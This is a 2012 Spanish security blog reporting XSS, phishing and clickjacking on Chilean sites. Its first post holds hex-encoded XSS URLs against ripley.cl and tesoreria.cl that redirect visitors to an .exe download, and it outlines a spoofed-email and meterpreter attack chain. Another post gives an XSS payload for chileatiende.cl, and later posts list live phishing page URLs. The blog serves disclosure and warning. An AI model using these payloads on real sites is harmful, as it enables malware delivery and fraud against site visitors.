lunes, 30 de julio de 2012

Tomando ventaja de Cross-site scripting para 'Infectar'

En varias ocasiones en las cuales reportamos algunos Cross-site scripting, las soluciones mas rápidas son evitar el uso de la etiqueta <script> o bien filtrar la inyeccion de codigo Javascript, pero y ¿que pasa con las etiquetas html?, la verdad muchas veces nos escontramos que no fueron fixeadas y siguen presentes para poder inyectar codigo. En esta prueba utilizare 2 sitios bastante conocidos y aprovechare el no filtrado de etiquetas Html para "infectar" un visitante.

Primer caso:


Sitio: www.ripley.cl  , el xss fue reportado hace mucho tiempo, aun asi permite el uso de una etiqueta html que nos permite redireccionar hacia un sitio arbitrariamente. Para la prueba he subido un .exe SIN contenido solo como prueba de concepto a un host.

Al entrar al sitio principal de RIPLEY, no redirige automáticamente a http://www.ripley.cl/webapp/wcs/stores/servlet/StoreCatalogDisplay?storeId=10051&catalogId=100516
, es la variable catalogId la que nos permite el uso de esta etiqueta.

La Url la dejamos de la forma siguiente con un poco de Hexa redireccionando al sitio con el .exe:

http://www.ripley.cl/webapp/wcs/stores/servlet/StoreCatalogDisplay?storeId=10051&catalogId=10051%27%22%3e%3c%6d%65%74%61%20%68%74%74%70%2d%65%71%75%69%76%3d%22%52%65%66%72%65%73%68%22%20%63%6f%6e%74%65%6e%74%3d%22%30%3b%75%72%6c%3d%68%74%74%70%73%3a%2f%2f%77%77%77%2e%64%72%69%76%65%68%71%2e%63%6f%6d%2f%66%69%6c%65%2f%44%46%50%75%62%6c%69%73%68%46%69%6c%65%2e%61%73%70%78%2f%46%69%6c%65%49%44%31%30%39%34%31%30%39%38%36%37%2f%4b%65%79%72%77%69%36%61%63%78%6c%67%33%61%64%2f%70%6f%63%2e%65%78%65%22%3e

Obteniendo lo siguiente:


















Segundo caso:



Sitio: http://www.Tesoreria.cl

El Cross-site Scripting fue reportado a Secureless mediante el ID : #2258
y afecta la variable 'idn' . Realizamos el mismo procedimiento y obtenemos.


http://www.tesoreria.cl/web/noticias/verDetalle.do?idn=4126%27%22%3e%3c%6d%65%74%61%20%68%74%74%70%2d%65%71%75%69%76%3d%22%52%65%66%72%65%73%68%22%20%63%6f%6e%74%65%6e%74%3d%22%30%3b%75%72%6c%3d%68%74%74%70%73%3a%2f%2f%77%77%77%2e%64%72%69%76%65%68%71%2e%63%6f%6d%2f%66%69%6c%65%2f%44%46%50%75%62%6c%69%73%68%46%69%6c%65%2e%61%73%70%78%2f%46%69%6c%65%49%44%31%30%39%34%31%30%39%38%36%37%2f%4b%65%79%72%77%69%36%61%63%78%6c%67%33%61%64%2f%70%6f%63%2e%65%78%65%22%3e 

Obtenemos lo siguiente:





Está claro que podemos tomar ventajas del Xss, ya no basta como decian antes verificar el comienzo de la Url, aun mas podriamos utilizar un acortador de url y seria aun mas efectivo.

Imaginemos un ataque mas completo en el caso de Ripley:

Mediante el uso de  Mail Spoofing enviamos propaganda de la tienda con una promocion llamativa o con un premio tentador, desde un remitente bastante creible que no levante sospechas
Incluimos un link con raiz http://www.ripley.cl que redireccione , a distintas opciones, puede ser:

- La descarga de malware
- A un sitio con malware
- Descarga de un .exe para obtener un session meterpreter.
- Redirrecionar a un sitio con publicidad
- Asociar con metasploit para obtener una sesion meterpreter via Uripath

Lo que se les pudiera ocurrir. Un usuario promedio podria caer facilmente en un "ataque" como este sin mayor preocupacion, y ¿Cual fue el origen? , bueno el Cross-site scripting en el sitio.


Saludos:

PD: El sitio de Ripley de reportado hace meses, y la inyeccion de Javascript al parecer fue corregida no asi la utilizacion de esta etiqueta html, en el caso de Tesoreria.cl esta reportado a Secureless como mencione anteriormente por algun usuario, no se la existencia de un reporte directo, emitire uno de todas maneras.
PD2: EL .exe utilizado en esta prueba no contiene ningun tipo de malware, consiste nada mas que en un archivo vacio en formato .exe.

viernes, 27 de julio de 2012

Phishing - Banco Ripley

En un comentario de un Post anterior me señalaron lo que parecia ser un Phishing que tiene como objetivo engañar a clientes del Banco Ripley.

La sitio es el siguiente:  http://soportenlinea.16mb.com/bancoripley/banco_ripley/index.html




Bastante poco real la verdad, es la sumatoria de imagenes, a excepcion del 'login', no asi el sitio real  http://www.bancoripley.cl/ .


Saludos

lunes, 2 de julio de 2012

[xss] en ChileAtiende #2



Anteriormente había reportado unos xss , los cuales fueron fixeados
Ahora se ve afectado el buscador nuevamente pero por un subdominio.

El xss: http://buscador.chileatiende.cl/buscador/consulta?q='"><script>alert(%2FXSS%2F)<%2Fscript>&filtro=





Saludos, reportado via twitter.

martes, 29 de mayo de 2012

Page Source: Subsecretaria de Transportes -Chile








Hoy navegaba por el sitio http://www.subtrans.gob.cl Subsecretaria de Transportes - Chile y de un momento a otro me di cuenta que habia un link que no resaltaba a la vista pero estaba ahi, obviamente no correspondia a un sitio original de la pagina sino que alguien lo habia puesto ahi. Fijemonos en el titulo del link y esto nos aclarara a razon.

En teoria podriamos decir que estamos presencia de Clickjacking ya que al hacer click en un lugar "vacio" estariamos siendo redireccionados al sitio  http://www.append-h.com , vacio entrecomillas porque en verdad solo esta del mismo color del fondo.



Para recolectar mas informacion del sitio busque en virus total si habia algun analisis y realice uno:  https://www.virustotal.com/url/77970e35cb3d165862cfefcfff6883569b269f9cb2ecf7fc35a14c3538fc2192/analysis/

+Bit defender fue el unico que lo catagorizo como: Malware Site

Saludos.





domingo, 20 de mayo de 2012

Phishing Banco BBVA - Chile



Ultimamente he publicado varios sitios fraudulentos de phishing para bancos de Chile, esta vez lo toco a el Banco BBVA.

El sitio que aloja estas paginas fraudulentas es:




Sitios Fraudulentos:








Saludos.

viernes, 18 de mayo de 2012

Nuevamente: Phishing Banco Santander - Chile





La verdad con esta es la tercera vez creo que publico un sitio alojando paginas fraudulentas para phishing Banco Santander - Chile.

Lo que llama la atencion esta vez es que le toco a un sitio Gubernamental de Mexico, no es tan extraño ya que debido a alguna vulnerabilidad en el sitio mismo los delincuentes toman acceso a ella pudiendo subir y administrar contenidos a gusto.

El sitio en cuestion es:

http://www.tacotalpa.gob.mx




Nos dirigimos al directorio   ../1/view.asp_files/


Aqui en donde se alojan los sitios fraudulentos:

error.htm
vsBs.html
vsMs.html
vsTs.html


Screenshots:

http://www.tacotalpa.gob.mx/1/view.asp_files/vsMS.html
Despues de una ventana que explica el porque piden las claves salta esta tipica pantalla fraudulenta.


Saludos @Shinee_
Pd: Si bien los archivos son del año 2010 siguen ahi, pudiendo causar daños a los usuarios.

Clickjacking & TaringaMusica.com

ClickJacking & TanringaMusica.com

El dia de ayer navegaba por este sitio cuando derrepente creo que al hacer click en un espacio "sin elemento" me aparecio el siguiente aviso de NoScript.




Un potencial clickjacking me ha detectado NoScript, la direccion me apunta a facebook.com y lo seguire para ver que sucede, pero antes veamos esto:





*Observemos que el puntero esta en una zona en blanco, pero abajo en la base de la ventana podemos darnos cuenta que nos esta linkeando a un 'like.php?href" de Facebook, pero veamos de que..


Los responsables de esto son estos dos archivos:








Vemos que todo el fondo del sitio queda afectado al secuestro de click.
Saludos, que no secuestren tus clicks 8)